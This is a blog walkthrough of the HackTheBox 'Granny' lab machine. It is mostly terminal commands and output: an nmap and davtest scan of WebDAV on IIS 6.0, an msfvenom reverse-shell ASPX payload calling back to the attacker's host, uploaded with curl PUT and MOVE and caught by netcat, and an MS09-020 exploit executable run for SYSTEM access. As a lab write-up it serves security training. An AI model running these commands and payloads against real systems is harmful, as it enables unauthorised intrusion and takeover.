Cracking Granny, HackTheBox without Metasploit.

Recon

┌──(kali㉿kali)-[~/HackTheBox/Granny/recon]
└─$ nmap -sC -sV -p0-1000 10.10.10.15 > results.txt &
┌──(kali㉿kali)-[~/HackTheBox/Granny/recon]
└─$ cat results.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-20 08:01 EST
Nmap scan report for 10.10.10.15
Host is up (0.17s latency).
Not shown: 1000 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Date: Wed, 20 Jan 2021 15:24:03 GMT
| Server Type: Microsoft-IIS/6.0
|_ WebDAV type: Unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.03 seconds

Gaining Access

┌──(kali㉿kali)-[~/HackTheBox/Granny/recon]
└─$ davtest -url http://10.10.10.15 > test.txt &
┌──(kali㉿kali)-[~/HackTheBox/Granny/recon]
└─$ cat test.txt
********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.10.10.15
********************************************************
NOTE Random string for this session: jPNif9zgQLl7qEs
********************************************************
Creating directory
MKCOL SUCCEED: Created http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs
********************************************************
Sending test files
PUT cgi FAIL
PUT txt SUCCEED: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.txt
PUT cfm SUCCEED: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.cfm
PUT jsp SUCCEED: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.jsp
PUT shtml FAIL
PUT asp FAIL
PUT aspx FAIL
PUT pl SUCCEED: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.pl
PUT jhtml SUCCEED: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.jhtml
PUT php SUCCEED: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.php
PUT html SUCCEED: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.html
********************************************************
Checking for test file execution
EXEC txt SUCCEED: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.txt
EXEC cfm FAIL
EXEC jsp FAIL
EXEC pl FAIL
EXEC jhtml FAIL
EXEC php FAIL
EXEC html SUCCEED: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.html
********************************************************
/usr/bin/davtest Summary:
Created: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs
PUT File: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.txt
PUT File: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.cfm
PUT File: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.jsp
PUT File: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.pl
PUT File: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.jhtml
PUT File: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.php
PUT File: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.html
Executes: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.txt
Executes: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.html
┌──(kali㉿kali)-[~/HackTheBox/Granny/exploit]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.23 LPORT=53 -f aspx -o foothold.aspx
┌──(kali㉿kali)-[~/HackTheBox/Granny/exploit]
└─$ mv foothold.aspx foothold.txt
┌──(kali㉿kali)-[~/HackTheBox/Granny/exploit]
└─$ curl -X PUT http://10.10.10.15/foothold.txt --data-binary @foothold.txt
┌──(kali㉿kali)-[~/HackTheBox/Granny/exploit]
└─$ curl -X MOVE --header 'Destination:http://10.10.10.15/foothold.aspx' 'http://10.10.10.15/foothold.txt'
nc -nvlp 53
┌──(kali㉿kali)-[~/HackTheBox/Granny/exploit]
└─$ curl http://10.10.10.15/foothold.aspx
└─$ sudo nc -nvlp 53                                                                                          1 ⨯
[sudo] password for kali:
listening on [any] 53 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.15] 1039
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>
c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service
c:\windows\system32\inetsrv>net user
net user
User accounts for \\GRANNY-------------------------------------------------------------------------------
Administrator ASPNET Guest
IUSR_GRANPA IWAM_GRANPA Lakis
newuser pwn root
SUPPORT_388945a0 test
The command completed successfully.
c:\windows\system32\inetsrv>net user ASPNET
net user ASPNET
User name ASPNET
Full Name ASP.NET Machine Account
Comment Account used for running the ASP.NET worker process (aspnet_wp.exe)
User's comment Account used for running the ASP.NET worker process (aspnet_wp.exe)
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 4/12/2017 4:17 PM
Password expires Never
Password changeable 4/12/2017 4:17 PM
Password required No
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed AllLocal Group Memberships *Users
Global Group memberships *None
The command completed successfully.
c:\windows\system32\inetsrv>systeminfo
systeminfo
Host Name: GRANNY
OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Uniprocessor Free
Registered Owner: HTB
Registered Organization: HTB
Product ID: 69712-296-0024942-44782
Original Install Date: 4/12/2017, 5:07:40 PM
System Up Time: 0 Days, 1 Hours, 58 Minutes, 27 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory: 1,023 MB
Available Physical Memory: 773 MB
Page File: Max Size: 2,470 MB
Page File: Available: 2,304 MB
Page File: In Use: 166 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 1 Hotfix(s) Installed.
[01]: Q147222
Network Card(s): N/A

More Recon

┌──(kali㉿kali)-[~/HackTheBox/Granny/exploit/Windows-Exploit-Suggester]
└─$ ./windows-exploit-suggester.py --database 2021-01-21-mssb.xls --systeminfo info.txt > suggestion.txt &
[1] 8468

┌──(kali㉿kali)-[~/HackTheBox/Granny/exploit/Windows-Exploit-Suggester]
└─$ 1 ⚙
[1] + done ./windows-exploit-suggester.py --database 2021-01-21-mssb.xls --systeminfo >
┌──(kali㉿kali)-[~/HackTheBox/Granny/exploit/Windows-Exploit-Suggester]
└─$ cat suggestion.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 1 hotfix(es) against the 356 potential bulletins(s) with a database of 137 known exploits
[*] there are now 356 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2003 SP2 32-bit'
[*]
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[*] https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
[*] https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF
[*]
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[*] https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC
[*] https://www.exploit-db.com/exploits/37098/ -- Microsoft Windows - Local Privilege Escalation (MS15-010), PoC
[*] https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows win32k Local Privilege Escalation (MS15-010), PoC
[*]
[E] MS14-070: Vulnerability in TCP/IP Could Allow Elevation of Privilege (2989935) - Important
[*] http://www.exploit-db.com/exploits/35936/ -- Microsoft Windows Server 2003 SP2 - Privilege Escalation, PoC
[*]
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[*] http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC
[*]
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[*] https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC
[*] http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC
[*] http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC
[*] http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF
[*] http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF
[*] http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF
[*]
[M] MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) - Important
[*] http://www.exploit-db.com/exploits/34112/ -- Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation, PoC
[*] http://www.exploit-db.com/exploits/34982/ -- Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation
[*]
[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical
[*] http://www.exploit-db.com/exploits/35101/ -- Windows TrackPopupMenu Win32k NULL Pointer Dereference, MSF
[*]
[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important
[*] https://www.exploit-db.com/exploits/39525/ -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC
[*] https://www.exploit-db.com/exploits/39446/ -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC
[*]
[E] MS14-035: Cumulative Security Update for Internet Explorer (2969262) - Critical
[E] MS14-029: Security Update for Internet Explorer (2962482) - Critical
[*] http://www.exploit-db.com/exploits/34458/
[*]
[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
[*] http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote Command Execution, PoC
[*]
[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important
[E] MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) - Important
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M] MS13-071: Vulnerability in Windows Theme File Could Allow Remote Code Execution (2864063) - Important
[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[M] MS11-080: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799) - Important
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[M] MS09-065: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947) - Critical
[M] MS09-053: Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254) - Important
[M] MS09-020: Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483) - Important
[M] MS09-004: Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420) - Important
[M] MS09-002: Cumulative Security Update for Internet Explorer (961260) (961260) - Critical
[M] MS09-001: Vulnerabilities in SMB Could Allow Remote Code Execution (958687) - Critical
[M] MS08-078: Security Update for Internet Explorer (960714) - Critical
[*] done
┌──(kali㉿kali)-[~/GitRepos/windows-kernel-exploits/MS09-020/MS09-020-KB970483-CVE-2009-1535-IIS6]
└─$ ls
IIS6.0.exe
┌──(kali㉿kali)-[~/GitRepos/windows-kernel-exploits/MS09-020/MS09-020-KB970483-CVE-2009-1535-IIS6]
└─$ curl -X PUT http://10.10.10.15/exploit.txt --data-binary @IIS6.0.exe
┌──(kali㉿kali)-[~/GitRepos/windows-kernel-exploits/MS09-020/MS09-020-KB970483-CVE-2009-1535-IIS6]
└─$ curl -X MOVE --header 'Destination:http://10.10.10.15/exploit.exe' 'http://10.10.10.15/exploit.txt'
C:\>dir /S /P "exploit.exe"
dir /S /P "exploit.exe"
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Inetpub\wwwroot01/21/2021 06:43 PM 211,716 exploit.exe
1 File(s) 211,716 bytes
Total Files Listed:
1 File(s) 211,716 bytes
0 Dir(s) 18,125,094,912 bytes free
C:\>cd Inetpub\wwwroot
cd Inetpub\wwwroot
C:\Inetpub\wwwroot>exploit.exe whoami
exploit.exe whoami
nt authority\system
-------------------------------------------
kindle-->Got WMI process Pid: 1396
begin to try
kindle-->Found token SYSTEM
kindle-->Command:whoami
C:\Inetpub\wwwroot>
C:\Inetpub\wwwroot>exploit.exe cmd.exe
exploit.exe cmd.exe
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\Inetpub\wwwroot>whoami
whoami
-------------------------------------------
kindle-->Got WMI process Pid: 1396
begin to try
kindle-->Found token SYSTEM
kindle-->Command:cmd.exe
nt authority\system
C:\Inetpub\wwwroot>

Flags

C:\Documents and Settings>cd Lakis/Desktop
cd Lakis/Desktop
C:\Documents and Settings\Lakis\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings\Lakis\Desktop04/12/2017 09:19 PM <DIR> .
04/12/2017 09:19 PM <DIR> ..
04/12/2017 09:20 PM 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 18,125,111,296 bytes free
C:\Documents and Settings\Lakis\Desktop>type user.txtC:\Documents and Settings>cd Administrator\Desktop
cd Administrator\Desktop
C:\Documents and Settings\Administrator\Desktop>type root.txt

--

--

Grad Student. Member Bi0s.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store